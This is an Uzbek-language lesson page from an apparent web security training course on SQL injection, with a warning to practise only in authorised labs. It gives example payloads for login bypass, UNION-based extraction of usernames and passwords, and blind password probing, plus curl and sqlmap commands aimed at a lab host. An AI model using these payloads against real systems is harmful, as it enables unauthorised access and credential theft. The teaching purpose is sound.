O'quv darsi / Web Application Security

SQL Injection

Foydalanuvchi kiritmasini SQL'ga aralashtirish — klassik OWASP #1.

30 daq.o'rta3 komanda2/5

Dars holati

Davom etmoqda

Amaliy komandalar0/3

Streak saqlash uchun kiring

Maqsadlar

Login bypass
UNION-based
Blind SQLi

Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

O'qish

Misol payload'lar

Login bypass: `admin' --` UNION: `' UNION SELECT username,password FROM users--` Blind: `' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--`

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

$curl "http://target.lab/login?u=admin'--&p=x"

Kutilgan natija:Welcome

$sqlmap -u 'http://target.lab/item?id=1' --dbs

$sqlmap -u 'http://target.lab/item?id=1' -D shop --tables

Oldingi dars Keyingi dars